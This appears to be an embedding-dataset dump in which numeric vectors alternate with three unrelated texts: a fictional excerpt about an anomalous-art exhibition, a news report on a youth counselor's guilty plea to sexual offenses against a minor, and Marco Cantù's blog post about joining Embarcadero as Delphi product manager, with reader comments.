-0.03397517651319504, -0.01488908939063549, 0.18017971515655518, 0.0015083617763593793, -0.0404929518699646, 0.015448450110852718, 0.02309751696884632, 0.025965632870793343, 0.053581204265356064, -0.009618482552468777, -0.03490618243813515, 0.012509090825915337, -0.040813129395246506, 0.039678312838077545, -0.026172777637839317, 0.037374403327703476, 0.016454916447401047, -0.05137086659669876, -0.009944729506969452, -0.039426881819963455, -0.08101461082696915, 0.04835742712020874, -0.004267767071723938, -0.007769835647195578, 0.004946248140186071, 4.018925186675166e-33, 0.006784695666283369, -0.06963840872049332, -0.05215590447187424, -0.0062067583203315735, -0.02665243111550808, -0.07379909604787827, -0.008586663752794266, -0.05564075708389282, -0.09378214925527573, -0.013816292397677898, -0.08433730155229568, 0.02907387539744377, 0.016457833349704742, -0.10735193639993668, 0.04490681737661362, 0.010240176692605019, -0.09709975123405457, -0.05174373462796211, -0.060097552835941315, -0.02437487244606018, 0.01884671114385128, 0.02539140358567238, -0.06562142819166183, -0.08248844742774963, -0.07056697458028793, -0.021163782104849815, -0.053860265761613846, -0.013436476700007915, 0.056236911565065384, -0.025625919923186302, -0.04122596234083176, 0.00036841738619841635, -0.0157833993434906, 0.07529931515455246, -0.04030205309391022, 0.03675573319196701, 0.013230777345597744, -0.050984956324100494, -0.029458636417984962, 0.06510468572378159, -0.1383899599313736, 0.02274671010673046, -0.03783755749464035, -0.03063417412340641, 0.05330492556095123, -0.008257693611085415, -0.0059997932985424995, -0.03740531951189041, -0.024333322420716286, -0.06137682497501373, 0.07126405090093613, 0.004888680763542652, 0.09443001449108124, 0.07744810730218887, -0.006137739401310682, 0.0030709903221577406, 0.07368990033864975, 0.02645167149603367, 0.032450590282678604, 0.03136179968714714, -0.018277937546372414, -0.019254833459854126, -0.01744634285569191, -0.04663073644042015, 0.031102418899536133, 0.046997468918561935, 0.03336801007390022, 0.08240535110235214, -0.027474146336317062, -0.05051545426249504, -0.027428997680544853, 0.02854003570973873, -0.020255740731954575, -0.07786159962415695, 0.05520416423678398, 0.0783955380320549, -0.010356064885854721, -0.0681128278374672, 0.05313636735081673, -0.015897298231720924, 0.011872283183038235, -0.08923924714326859, -0.07762385159730911, -0.03983011469244957, 0.08992686122655869, -0.036628153175115585, -0.03526943176984787, -0.007052470464259386, -0.049038272351026535, -0.002264787908643484, -0.03399240970611572, 0.04913121089339256, 0.0048139989376068115, 0.05452049523591995, 0.025418099015951157, -4.9335189336744316e-33, 0.02461126446723938, -0.039941806346178055, -0.045224808156490326, 0.0225526150316, -0.0017741264309734106, -0.056808240711688995, 0.0535048246383667, 0.012929363176226616, -0.040479954332113266, 0.010636383667588234, 0.00692327693104744, -0.04846912994980812, -0.05873798206448555, 0.06623268872499466, -0.0077508497051894665, -0.04491354525089264, 0.041455771774053574, 0.060468126088380814, -0.04711391031742096, 0.05087514594197273, 0.03211790323257446, -0.021328473463654518, -0.09516499936580658, -0.04348433017730713, -0.0973137766122818, 0.09402436763048172, 0.03297483175992966, -0.05788154527544975, -0.015119682997465134, -0.0015895527321845293, -0.026408419013023376, 0.045097414404153824, -0.02177591808140278, -0.0026125668082386255, 0.10453900694847107, 0.0863535925745964, 0.06058671697974205, 0.032095372676849365, 0.014079876244068146, -0.062044281512498856, 0.007937104441225529, 0.04864977300167084, -0.0008077495149336755, 0.051869094371795654, 0.0712205022573471, 0.10328984260559082, -0.041351377964019775, -0.03539183363318443, -0.05951157212257385, 0.09457697719335556, -0.021481329575181007, 0.018659299239516258, -0.12029607594013214, 0.07320190221071243, -0.0551648810505867, -0.027983272448182106, 0.09065554291009903, 0.01635603979229927, -0.07064611464738846, 0.005983621347695589, -0.023685825988650322, -0.021512368693947792, -0.09246329218149185, 0.03633125126361847, 0.016122236847877502, 0.11078847199678421, 0.0008812386076897383, 0.04487340524792671, -0.05425214022397995, -0.001225886051543057, -0.11384834349155426, 0.01061264704912901, 0.0015362432459369302, -0.011147908866405487, 0.03320114314556122, 0.024155285209417343, 0.07736407220363617, 0.035862356424331665, 0.05458224564790726, 0.08537376672029495, -0.04390796273946762, 0.04474546015262604, 0.032944150269031525, 0.026711663231253624, 0.05441490560770035, 0.06789640337228775, 0.011010521091520786, -0.02009444497525692, 0.03871415928006172, 0.04532858729362488, 0.06818938255310059, -0.009406769648194313, 0.009448755532503128, -0.02575058676302433, -0.009010217152535915, -5.974032291078402e-8, -0.02490495704114437, -0.0073303161188960075, -0.06882799416780472, 0.06024962291121483, 0.00626190984621644, -0.0334298238158226, -0.07918909192085266, -0.05295296758413315, -0.015883158892393112, 0.023121682927012444, 0.04772303253412247, 0.03864288702607155, -0.10878679901361465, 0.011105155572295189, 0.03737953305244446, 0.05250321701169014, -0.03840699419379234, -0.10228969901800156, -0.0036229894030839205, -0.029195956885814667, -0.08570857346057892, 0.003702444490045309, -0.04904189705848694, 0.054448202252388, 0.007283862214535475, -0.021987944841384888, -0.07346230000257492, 0.024649513885378838, -0.011220427230000496, -0.08888121694326401, 0.03127937391400337, 0.05371270701289177, -0.05374763160943985, -0.019906485453248024, 0.03322663530707359, -0.037479646503925323, 0.0267315860837698, -0.05537717044353485, 0.07878910005092621, -0.0600302629172802, -0.10596458613872528, -0.05956832692027092, -0.09970013052225113, -0.01920229010283947, 0.12814770638942719, -0.0019430912798270583, 0.06741034239530563, 0.01319317240267992, -0.051494985818862915, -0.10719490051269531, -0.061829086393117905, -0.05139488726854324, 0.055740199983119965, 0.008550739847123623, 0.060735948383808136, 0.003305356716737151, -0.08200496435165405, 0.007232055068016052, -0.0027376532088965178, -0.041103679686784744, 0.020503537729382515, 0.012079698964953423, -0.023650484159588814, 0.01128094270825386 ]
In the nineteenth century, the march of progress made it possible for the first time for human science to contemplate and comprehend those phenomena which had long seemed to contravene the laws of nature. Within a matter of decades, concepts that had long been viewed as witchcraft or sorcery were laid bare in the terms of a new and secret science, and governments and organizations around the world began to classify, study, and collect all such anomalies. And, just as artists throughout history have turned a critical eye to the events of the day in their work, so too did the artists of this scientific Renaissance begin to interpret these new discoveries on canvas. By the 1870s, Paris was the center of the world of anomalous art, and the city stood witness to endless debates about the role of the anomalous in art, or whether such a role existed at all. When in 1874 the famed Salon des Magnifiques refused to allow any "works of a phantasmagorical nature" to be displayed at their grand exhibition, those artists shut out by the committee organized their own counter-exhibition, to be held at the same time across the river. "Sommes-Nous Devenus Magnifiques?", as the show came to be called, was the talk of the Parisian press for months, earning equal amounts of curiosity, dismissal, and outright derision, but the exiled gadflies had made their point - the paranormal, the anomalous, and the bizarre had found a place in the world of art and would not be so easily gotten rid of. "Sommes-Nous Devenus Magnifiques?" held its exhibitions every ten years thereafter, and as time passed the world of anomalous art grew larger. From its beginnings in Paris, artists from all across France and Europe, and later from the Americas and the Orient as well, began attending the increasingly prestigious - and increasingly bizarre and difficult to keep hidden from the disdainful eyes of a concerned government - exhibition, expressing new and different interpretations of the role of the anomalous in human life. It was at the sixth decennial exhibition in 1924 that the growing rift between the two largest schools of thought - logical vs. emotional, science vs. faith, Old World vs. New - came to a head, for it was at that show that for the first time, the works of the French surrealist Marcel Duchamp would be exhibited alongside those of Ruiz Marcos, the Mexican artist whose themes of magical realism and religious awe intertwined with the viscerally accessible Forteana of our world had set art critics worldwide at war with each other. Those who saw the two during the days leading up to the opening of the exhibition said they spent nearly the entire time in heated discussion with one another (in English, for neither spoke the other's mother tongue confidently) about everything under the Sun - the importance of the artist in relation to his work, the importance of context, faith, knowledge, law, free will, God, the State, democracy, Marxism, the war, the League of Nations, and the best way to serve a cup of coffee. It seemed that they might continue bickering throughout the entire exhibition, but as the artists prepared to greet the assembled press on the morning of its grand opening, they appeared to have finally come to an understanding. If there is one image that comes to the mind of any art historian when the 1924 Expo is brought up, it is of that iconic photo of Duchamp and Ruiz posing side by side with their fellow artists in front of the still-closed doors, Marcos seemingly leaning over to whisper something into Duchamp's ear. For decades, many have speculated on what words Marcos had for his colleague during that memorable instant; a question of metaphysics? Or a challenge? An affirmation of their coming to terms? A reminder of the reason why they were there at that moment of time? Perhaps an expression of amazement at the multitudes that had come to see them? According to one reporter who claimed he stood close enough to overhear that whisper amidst the din of the crowd, it was all five at once, expressed in four simple words; "Are we cool yet?" - Excerpt from The Coolest War: Memories of a Critic, by Anonymous
[ 0.010230445303022861, 0.07012493163347244, -0.04003281518816948, 0.03648906201124191, 0.03431392461061478, 0.010222401469945908, 0.03508543595671654, -0.02681650035083294, -0.047341249883174896, -0.006196373142302036, 0.0035585311707109213, 0.013159382157027721, 0.005208093672990799, -0.014826970174908638, -0.119534432888031, 0.010498365387320518, -0.025978663936257362, -0.0014479057863354683, -0.011094368994235992, 0.10631270706653595, 0.018344778567552567, -0.10526201874017715, -0.004836011677980423, 0.014914626255631447, -0.028501365333795547, -0.0027080150321125984, -0.06899011880159378, -0.11587726324796677, -0.0052487473003566265, -0.03445840999484062, -0.014279653318226337, 0.11799760907888412, -0.04786039888858795, -0.047757185995578766, 0.09077565371990204, 0.02220679447054863, 0.03750881925225258, 0.022002017125487328, 0.02595052681863308, 0.004846363328397274, 0.009173180907964706, -0.03130040317773819, -0.0805923119187355, 0.0020689854864031076, -0.0549720898270607, -0.03654099628329277, 0.02758798561990261, 0.003033459885045886, -0.0372597798705101, 0.008647730574011803, -0.02316962741315365, -0.08036604523658752, -0.04708496481180191, -0.08675696700811386, -0.02171660028398037, -0.05185411125421524, 0.013353182002902031, 0.050351887941360474, -0.023438595235347748, -0.015173772349953651, 0.033382661640644073, 0.028928842395544052, -0.053642887622117996, 0.054526668041944504, 0.07949573546648026, 0.020304666832089424, -0.027653586119413376, -0.024052297696471214, 0.024835797026753426, -0.0052119409665465355, 0.049077779054641724, -0.053730785846710205, -0.006690985057502985, 0.024912774562835693, 0.12902964651584625, 0.054702278226614, -0.08289074897766113, 0.02863822691142559, -0.03865610808134079, -0.07691436260938644, 0.07004193216562271, -0.004671802278608084, 0.05713251233100891, -0.0035103238187730312, 0.013789058662950993, 0.025136111304163933, -0.014894775114953518, -0.0014263506745919585, 0.07266528159379959, -0.006021981127560139, -0.026473870500922203, -0.033882152289152145, -0.15569870173931122, 0.035996921360492706, 0.13200032711029053, -0.04075592756271362, 0.0014893878251314163, 0.03866584226489067, 0.062288686633110046, 0.03338121622800827, 0.028509357944130898, -0.0008098469115793705, -0.01317739486694336, 0.08926346153020859, 0.0373559407889843, -0.0940665751695633, -0.045453425496816635, -0.08453857898712158, -0.018390387296676636, 0.006331497337669134, 0.020114323124289513, 0.013689554296433926, 0.06772167980670929, -0.06668845564126968, 0.022500844672322273, 0.039037011563777924, 0.03685728460550308, -0.0013012991985306144, -0.025679899379611015, -0.0396256186068058, 0.084748774766922, 0.0554337203502655, -0.03393658995628357, 0.017257679253816605, -0.03270009532570839, 0.05072041600942612, -0.028566360473632812, 9.792453852815143e-34, 0.021572882309556007, 0.027203157544136047, 0.039155296981334686, 0.036099281162023544, 0.03108428791165352, -0.009812301956117153, 0.009830960072577, 0.019902873784303665, 0.048322711139917374, -0.005887745413929224, 0.07821161299943924, 0.005539895035326481, 0.024416660889983177, -0.009787961840629578, -0.00033371581230312586, -0.0034450162202119827, 0.1252189427614212, -0.045196689665317535, 0.04859166964888573, -0.04341739043593407, -0.023956388235092163, -0.027430856600403786, -0.03390267863869667, 0.0019772422965615988, -0.0409373976290226, 0.07608404010534286, -0.0558442696928978, 0.0294524934142828, -0.05177459493279457, 0.04951595887541771, 0.037389349192380905, 0.015086501836776733, 0.05116927996277809, -0.0008897946681827307, -0.034517135471105576, -0.03841264545917511, 0.04136105254292488, -0.0796162337064743, 0.09372583031654358, 0.0004229251353535801, -0.016446107998490334, -0.0028154405299574137, -0.006971556693315506, -0.03747713565826416, 0.03497149050235748, 0.06236414238810539, 0.0162507276982069, 0.04702657461166382, -0.04140578955411911, 0.02857775054872036, -0.04403798282146454, 0.055430296808481216, -0.025035791099071503, -0.026775376871228218, 0.04994406923651695, 0.04963827505707741, -0.08732383698225021, -0.07009056955575943, -0.02461882308125496, -0.06450296938419342, 0.052883557975292206, 0.12185078859329224, 0.010678453370928764, 0.08649387210607529, 0.004004647023975849, -0.03662794828414917, -0.0006361952982842922, 0.04192198067903519, -0.024486076086759567, 0.05353739485144615, -0.17899981141090393, 0.047659244388341904, -0.015132727101445198, -0.08999945968389511, 0.0669277086853981, 0.028165968134999275, 0.0340147390961647, -0.021419253200292587, -0.040685392916202545, -0.02743070386350155, -0.030220966786146164, 0.011618769727647305, 0.01663947105407715, -0.015998855233192444, -0.07503055036067963, -0.012770877219736576, 0.0354008786380291, 0.08295087516307831, -0.009437852539122105, -0.0035553928464651108, -0.044393785297870636, 0.0256647989153862, -0.002872491953894496, -0.08519460260868073, -0.11177080124616623, -2.5438755696710042e-33, -0.029915275052189827, -0.04350121691823006, -0.06782247871160507, 0.03754109889268875, 0.033342573791742325, -0.029504843056201935, -0.09450215846300125, -0.05093749612569809, 0.02074677310883999, 0.006489983294159174, -0.001061558024957776, -0.03590273857116699, -0.02159666270017624, -0.08619072288274765, -0.054578378796577454, -0.03715438395738602, -0.03482494130730629, 0.05101149156689644, -0.0657215267419815, 0.10282552987337112, 0.034055210649967194, 0.04412415251135826, -0.1277770847082138, -0.1210334375500679, -0.0870785266160965, 0.08903386443853378, 0.039102260023355484, -0.10970307141542435, -0.005210526287555695, 0.0014182091690599918, -0.07008624076843262, 0.03820689767599106, -0.01214415580034256, -0.017120329663157463, 0.008201038464903831, 0.023620424792170525, 0.07128292322158813, -0.011087993159890175, 0.008138805627822876, -0.023892899975180626, -0.03559089079499245, 0.0446801632642746, -0.0016006367513909936, -0.027136167511343956, 0.020959999412298203, -0.029299048706889153, -0.04739841818809509, 0.02046394534409046, 0.02236698940396309, 0.022140204906463623, -0.0267261303961277, 0.03506164252758026, 0.023403622210025787, -0.015429675579071045, -0.03522840514779091, -0.02719537355005741, -0.026517098769545555, -0.04124348238110542, -0.022972214967012405, 0.13639655709266663, 0.041238680481910706, 0.015530312433838844, -0.09077578783035278, -0.006465862039476633, 0.021667692810297012, 0.0077880388125777245, -0.08688601106405258, 0.1221189945936203, 0.00504485797137022, -0.01558822300285101, 0.05312992259860039, 0.06305551528930664, -0.020024972036480904, 0.01238526962697506, -0.02021007053554058, -0.001053842599503696, 0.04871254414319992, -0.013137774541974068, -0.0013141849776729941, 0.04967629536986351, -0.028638683259487152, 0.03481653705239296, 0.012525675818324089, -0.009552868083119392, 0.10970360785722733, 0.04099159315228462, -0.12224632501602173, -0.033030156046152115, -0.031584352254867554, -0.058206863701343536, 0.022673610597848892, -0.05808059498667717, -0.020431850105524063, 0.032942965626716614, 0.10597502440214157, -5.571254391156799e-8, -0.014568139798939228, 0.08872117102146149, -0.013972633518278599, -0.02119522914290428, 0.07082641124725342, -0.10405360162258148, 0.04094872996211052, 0.027056308463215828, -0.09551648050546646, 0.016044730320572853, -0.06487289816141129, 0.005960184149444103, 0.0495939776301384, 0.04499536007642746, 0.06240645423531532, -0.04886173456907272, 0.05310599505901337, -0.07984204590320587, -0.07232976704835892, 0.022569706663489342, 0.04462705925107002, -0.004311735276132822, -0.007710722275078297, -0.11888457089662552, -0.05327168479561806, 0.0007161616813391447, -0.03081545978784561, -0.04666326195001602, -0.01302709337323904, 0.05333679914474487, -0.01386482547968626, -0.00489198649302125, 0.01660468615591526, -0.0008840745431371033, -0.0316661074757576, -0.04544205963611603, -0.06725158542394638, -0.027278894558548927, 0.020807456225156784, -0.04524179920554161, 0.026813872158527374, 0.00010722748265834525, 0.0844319760799408, 0.09216326475143433, 0.015589941293001175, -0.05099909380078316, 0.07545983046293259, -0.010935429483652115, 0.011027836240828037, 0.129273921251297, -0.03589508682489395, 0.048344384878873825, 0.058454807847738266, 0.005342133343219757, 0.013466493226587772, 0.022873232141137123, 0.04516642168164253, 0.04596666619181633, -0.07123647630214691, -0.021748274564743042, 0.06585343182086945, 0.02051018550992012, -0.022275825962424278, 0.004320123698562384 ]
FARMINGTON — A former counselor of the popular Especially For Youth religious seminar has pleaded guilty to sexual activity with a teenage boy he met through the program. Keldon Severn "KC" Cook, 29, pleaded guilty earlier this week to one count of attempted sexual exploitation of a minor and three counts of unlawful sexual conduct with a 16 or 17 year old. All the charges are third-degree felonies. Cook was originally charged with four counts of forcible sodomy, a first-degree felony; one count each of second-degree felony forcible sexual abuse and sexual exploitation of a minor; and one third-degree felony count of dealing in materials harmful to a minor. Investigators say Cook met the boy, who was 14 at the time, at BYU in 2012 when he was assigned as his counselor during the weeklong program of The Church of Jesus Christ of Latter-day Saints. The two stayed in contact through social media and texting, police say, and began sending "inappropriate" and "disgusting" messages. The boy told investigators the explicit conversations confused him but that he looked up to Cook as a mentor. Shortly after the boy turned 16, Cook allegedly met with him at the LDS temple in Bountiful to "catch up" and then went to a nearby park. "(Cook) made advances toward the minor male in the minor male's car," the charges state. "The minor male stated to law enforcement that the defendant persuaded him that the contact they had was acceptable and that it was acceptable because (Cook) was his EFY counselor." Cook met up with the teen, then 17, twice more in 2014 at the same Davis County park. Cook and the boy also exchanged explicitly sexual photos with each other during the same time period, the charges state. "The defendant told the minor male that this was acceptable as he had photos with other 'EFY boys,'" the charges state. Cook, who was arrested in April, remains in the Davis County Jail. Sentencing has been scheduled for Nov. 30. × Photos Related Stories
[ -0.030912326648831367, 0.041310109198093414, -0.029922248795628548, -0.008455658331513405, 0.054765403270721436, -0.004267802927643061, 0.035239238291978836, -0.06428501009941101, 0.008464578539133072, -0.05287115275859833, 0.10130005329847336, -0.059332650154829025, -0.015976522117853165, 0.015364783816039562, 0.020446259528398514, -0.03753615915775299, 0.05031736195087433, 0.061130840331315994, -0.031085772439837456, 0.018269984051585197, -0.05826356261968613, 0.0036715019959956408, 0.06058690696954727, -0.03850366920232773, 0.03547967970371246, 0.01541439350694418, -0.023111417889595032, -0.048288680613040924, -0.061551760882139206, 0.05395547300577164, 0.0028767830226570368, 0.030274543911218643, 0.04805563762784004, 0.019319506362080574, 0.01528259739279747, -0.014221670106053352, 0.05889306217432022, 0.00969317089766264, 0.010325483977794647, 0.03267752379179001, 0.04250238835811615, -0.025725530460476875, 0.018018895760178566, -0.04892950877547264, -0.08469048887491226, -0.03191274031996727, -0.04813334345817566, -0.059669699519872665, 0.01773618347942829, -0.09116067737340927, -0.018414678052067757, -0.01943705976009369, 0.11125513166189194, 0.018966849893331528, -0.03574749082326889, -0.06837165355682373, -0.0819649025797844, 0.08170760422945023, 0.02774132788181305, 0.07607372105121613, -0.023260831832885742, 0.041564494371414185, 0.015062215737998486, 0.0035927307326346636, -0.012394440360367298, 0.061127226799726486, -0.006858524400740862, -0.019989289343357086, 0.09508513659238815, -0.002082481514662504, 0.1000167652964592, -0.007620207034051418, -0.06160517781972885, -0.051003191620111465, -0.04586995393037796, 0.011578124016523361, 0.028987620025873184, 0.007588195614516735, 0.02316630817949772, -0.07226523011922836, 0.004306773655116558, -0.0017233247635886073, -0.043381765484809875, -0.04720640555024147, -0.044426724314689636, -0.09200955927371979, -0.06110331043601036, 0.005735642742365599, 0.05773120000958443, 0.051170505583286285, 0.024859871715307236, -0.06411970406770706, -0.05044172331690788, -0.06749198585748672, 0.010335808619856834, 0.002583840861916542, -0.05425240099430084, -0.04013175517320633, -0.06257538497447968, 0.051072631031274796, -0.12363595515489578, 0.07824923098087311, -0.018681690096855164, -0.04532337933778763, 0.07055512070655823, 0.0004660531703848392, 0.005758241284638643, 0.06031384691596031, -0.0426969975233078, 0.009902705438435078, 0.07697222381830215, 0.060134079307317734, 0.033768828958272934, -0.04870682209730148, 0.10150513052940369, 0.03218597546219826, 0.06201433017849922, 0.01692230813205242, -0.06083143875002861, -0.001451572636142373, 0.034471284598112106, 0.01985221356153488, 0.020043035969138145, 0.09096204489469528, -0.11433648318052292, -0.13470332324504852, -0.02015933394432068, 3.919219388496435e-33, 0.07204029709100723, 0.011843666434288025, -0.02341713197529316, -0.06882992386817932, 0.06014147400856018, 0.022384563460946083, -0.00027940419386141, 0.06321192532777786, 0.026657309383153915, 0.0641922801733017, 0.00740745197981596, -0.06785444170236588, 0.0341445729136467, -0.07228129357099533, -0.018085632473230362, 0.0031254063360393047, -0.02260010503232479, 0.011955682188272476, 0.02645593322813511, 0.020020944997668266, 0.026435967534780502, -0.017159029841423035, 0.020517924800515175, 0.07001795619726181, -0.09498350322246552, -0.08320359885692596, 0.005727507174015045, 0.023915233090519905, 0.013604101724922657, -0.000767768535297364, -0.010627913288772106, -0.016838956624269485, 0.05710683763027191, 0.04541904479265213, 0.09411545097827911, 0.041862234473228455, 0.02302161604166031, -0.013662789016962051, 0.051558684557676315, 0.036665476858615875, -0.11761850863695145, 0.03047490306198597, 0.036820072680711746, 0.045134127140045166, -0.08451095223426819, 0.03298699110746384, -0.044968076050281525, -0.034279484301805496, -0.016623329371213913, -0.022478507831692696, 0.0012819754192605615, 0.07663804292678833, 0.012673952616751194, -0.04634469375014305, -0.04334721714258194, 0.05694800242781639, 0.05109867453575134, 0.05486326292157173, 0.021393677219748497, 0.04897676408290863, 0.10266823321580887, -0.0023372049909085035, -0.09492168575525284, -0.039293885231018066, -0.1318083256483078, -0.10642886906862259, -0.028220240026712418, 0.011668778955936432, -0.0349426306784153, -0.018847225233912468, -0.000014216740055417176, 0.040522102266550064, -0.01079513505101204, -0.040333185344934464, 0.06377480924129486, -0.029452500864863396, 0.02979428321123123, -0.08401933312416077, -0.03798449784517288, 0.03734441474080086, 0.018870051950216293, -0.04505686089396477, -0.05587828904390335, -0.027747249230742455, -0.13242891430854797, 0.020597539842128754, 0.0057042911648750305, -0.014223096892237663, 0.01760036312043667, 0.006628597155213356, 0.07622946053743362, -0.005927153397351503, 0.04754732549190521, -0.11180268228054047, 0.05858056992292404, -4.4570289924907557e-33, -0.04118453711271286, 0.01615506038069725, 0.016797637566924095, -0.06195325776934624, 0.01906290464103222, -0.1069878339767456, 0.0045322272926568985, 0.027883267030119896, 0.005536250304430723, -0.034413788467645645, 0.005569159518927336, -0.07595068216323853, 0.001706805662252009, 0.008314559236168861, 0.004162679426372051, 0.07716775685548782, -0.02060222625732422, 0.08983233571052551, -0.04356854036450386, -0.03383199870586395, 0.06655976176261902, 0.03950861096382141, -0.09002862870693207, 0.0493067130446434, -0.03320588171482086, -0.010853780433535576, 0.034630920737981796, 0.06201813742518425, -0.030262527987360954, 0.06054632365703583, 0.05865249037742615, 0.04836706072092056, 0.010970238596200943, 0.05989902839064598, -0.036498818546533585, 0.005719219800084829, 0.06351002305746078, -0.020389460027217865, -0.013595099560916424, -0.06977718323469162, 0.09281396120786667, -0.0021424819715321064, -0.03796403855085373, 0.04278616979718208, -0.06680372357368469, 0.03542779013514519, 0.015493896789848804, 0.12148717045783997, 0.057628583163022995, -0.00880670640617609, -0.07370083034038544, 0.028251107782125473, -0.007727213203907013, -0.023456541821360588, -0.04667280986905098, -0.054712191224098206, -0.008264224976301193, 0.006005945615470409, -0.05007525533437729, 0.000885565357748419, 0.09140758961439133, -0.060042623430490494, 0.02702016569674015, 0.03289462998509407, 0.001003247918561101, -0.02968565747141838, -0.027905289083719254, -0.03596637398004532, -0.058217164129018784, 0.07145257294178009, -0.06807813793420792, -0.052776116877794266, 0.05572942644357681, -0.047559719532728195, -0.07867245376110077, -0.017679568380117416, 0.007890768349170685, -0.045318976044654846, -0.05446786805987358, -0.0713222399353981, 0.0672825500369072, -0.09754393994808197, -0.013538649305701256, 0.034358732402324677, 0.060411904007196426, -0.01129849348217249, 0.05834060162305832, 0.0017801390495151281, -0.04126949980854988, 0.029892778024077415, -0.003559533506631851, -0.09576020389795303, 0.026905285194516182, 0.05232187360525131, -0.0020757580641657114, -5.19294829359751e-8, -0.028513537719845772, -0.045529238879680634, -0.07666335254907608, 0.07005520164966583, 0.08088713884353638, 0.10474031418561935, 0.0001258329430129379, -0.06715735793113708, 0.02975246123969555, -0.02531997300684452, -0.06402073800563812, 0.060758817940950394, -0.03728099912405014, -0.07071143388748169, 0.05003932863473892, -0.07758810371160507, 0.07317626476287842, -0.0974763035774231, 0.012024052441120148, 0.019325939938426018, 0.04906812310218811, 0.015546291135251522, -0.03752613440155983, 0.023056238889694214, -0.037825047969818115, -0.0006727026775479317, 0.020342038944363594, 0.12503203749656677, -0.014532509259879589, -0.00608412642031908, 0.023412242531776428, -0.04140845686197281, -0.07438945025205612, 0.027613556012511253, 0.024551531299948692, -0.02331431768834591, -0.16231977939605713, 0.014670281670987606, -0.005552816204726696, 0.009031645953655243, -0.00516169797629118, -0.014940280467271805, 0.020775027573108673, 0.059509824961423874, 0.039257343858480453, 0.013424784876406193, -0.037073757499456406, 0.06417933851480484, 0.09407467395067215, 0.0934283509850502, -0.006615113001316786, 0.021015025675296783, 0.059218525886535645, 0.012715037912130356, 0.045034006237983704, -0.013910487294197083, 0.042438969016075134, 0.02870418131351471, -0.032580241560935974, -0.003762578358873725, 0.0003552730195224285, -0.03221879526972771, 0.05097008869051933, -0.06811965256929398 ]
Joining Embarcadero as Delphi Product Manager If you follow my twitter account or have attended the product address of CodeRage, you now that I've just made a big career change, joining Embarcadero Technologies. If you follow my twitter account or have attended the product address of CodeRage, you now that I've just made a big career change, joining Embarcadero Technologies. I've been working with Borland and Embarcadero products for over two decades, have been writing books on the technologies (well, mostly Delphi), have been a technical partner and my company was (and still remains) a sales partner in Italy. I've been in touch with the R&D team, developer relations, marketing people and product managers. But even recently I won't have envisioned joining the company. I was offered the job to help shape Delphi's future and didn't have to ponder a lot. The position I'm taking is Delphi Product Manager, although there is actually a product management team for RAD Studio, with split and shared responsibilities. I'll be based in Europe (working from home, when not on the road), where there are some of the R&D teams and a large number of Delphi customers. For Delphi developers in Europe this is good news, as it might be easier to reach me at "local" conferences and events. I'll start by attending Be-Delphi in 2 weeks. In case you are wondering, I'll keep doing some of my current activities, like keeping this blog open and active and use my personal twitter account. I'll try to put some of my (limited) free time on books writing, and make sure some of my open source projects have a future. But it is hard to tell, as I have a lot to learn right now. Needless to say I'm open for comments, use my new email address marco.cantu at embarcadero.com (but I'll keep monitoring also my older email accounts). Feel also free to use this blog for posting comments, ideas, constructive criticism... you know what I mean, we need a healthy and more relaxed community around Delphi. So, this is all for now. Stay tuned to this space for news and updates. It's a new adventure, I hope you'll enjoy it with me. Long live Delphi! 40 Comments Joining Embarcadero as Delphi Product Manager As I've already tweeted on Twitter, I would like to congratulate you on your new job! I've used Delphi for many years for many things, and as a Delphi developer I feel assured that its future is in safe hands! Joining Embarcadero as Delphi Product Manager Congratulations to Embarcadero, the Delphi community worldwide and to you Marco! They are very lucky and fortunate to have you! Good luck and have fun! -Lino Joining Embarcadero as Delphi Product Manager Excellent news Marco. I'm sure you'll be up to this challenge. Lachlan Joining Embarcadero as Delphi Product Manager Congratulations Marco! All the best Joining Embarcadero as Delphi Product Manager Congrats Marco! I hope you will support a linux compiler soon! Best regards, Joining Embarcadero as Delphi Product Manager Wow, congratulations, Marco! And good luck! :) Joining Embarcadero as Delphi Product Manager I'm really excited by the news, for many reasons but mainly because we needed someone with real love for Delphi. Congratulations and you can be sure that the community is very happy with your new job. Joining Embarcadero as Delphi Product Manager All the best for you at Embarcadero. Joining Embarcadero as Delphi Product Manager It is great to know that we have a Delphi user voice inside Embarcadero! Congrats from me and the Brazilian MVP team! Joining Embarcadero as Delphi Product Manager Muchas Felicidades!, Enhorabuena, Congratulations!. Your last words are very important, a relaxed community, Lately we had have a lot of disturbing comments from the community, and personally i understand them, for example this last release came with less so needed features, win8 wasn't a priority, many custumers are waiting for linux or android, ORM, etc. visual livebinding is great, ti be short. Keep an eye on community and upon all keep visible the roadmap, it we'll be your key to succed. Joining Embarcadero as Delphi Product Manager Muchas felicitaciones Marco, qué buena noticia! Contigo al frente de Delphi, serán muchos los avances por venir! Éxitos! :) Qué afortunados somos! Joining Embarcadero as Delphi Product Manager Great news Marco, brazilian developers were so happy with the future of delphi now Joining Embarcadero as Delphi Product Manager This is excellent news for Delphi and the community! Congratulations, and I wish you great success in your new position! Joining Embarcadero as Delphi Product Manager Congratulations, Marco. Joining Embarcadero as Delphi Product Manager Congratulations. Wish you all the best. The wise bunny knows spectacular hops are always preceded by unspectacular preparation.(@bunnybuddhism) Joining Embarcadero as Delphi Product Manager Congratulation Marco. As Product Manager can you please post some comments on the following EMB -> Delphi -> Non-Technical blog: "If I were the Delphi Product Manager, I would ..." https://forums.embarcadero.com/thread.jspa?threadID=79195 or can you at least tell the community what your plans are, and how much impact you have in EMB to make Delphi again a success story? Currently I am really warried about the future for Delphi. Joining Embarcadero as Delphi Product Manager Congratulations Marco, I think.... Top of my wish list.... Stability and Quality, not new features and frameworks. How about bug report 104240 for a start. That effectively stops you using 64 bit Delphi for client side applications that make use of with MidasLib. So in a client server environment, you can only make use of the 64 bit on the server side. Joining Embarcadero as Delphi Product Manager Hi Marco, my congrats, after all your great Delphi support, you earned it !! IMHO, your appointment as the Delphi Product Manager is definitely the best news expected from a while by the Delphi community. Hopefully under your "Mastering wand" and with your great technical and communication skills will bring Delphi back to the developer hearts and minds. Delphi needs fresh blood ...and with the new mobile focus under RAD Mobile Studio umbrella we can expect more developers will look back into (REAL!) RAD. I also blogged about these late announcements: CodeRage 7: Day 1 Highlights - Marco Cantu is the new Delphi Product Manager, RAD Mobile Studio demoed, relevant links http://devstonez.wordpress.com/2012/11/07/coderage-7- day-1-highlights-marco-cantu-is-the-new-delphi- product-manager-rad-mobile-studio-demoed-relevant- links Joining Embarcadero as Delphi Product Manager Congratulazioni ! Un'ottima notizia per Delphi. Joining Embarcadero as Delphi Product Manager MArco... che dire complimentiiiiiiiii Non potevano scegliere uomo migliore per dare un futuro roseo a delphi... grazie per quello che fai (specialmente perchè lo fai bene....) Joining Embarcadero as Delphi Product Manager Congrats! This is a really bold move. What happens to Wintech Italia now though? Will it still 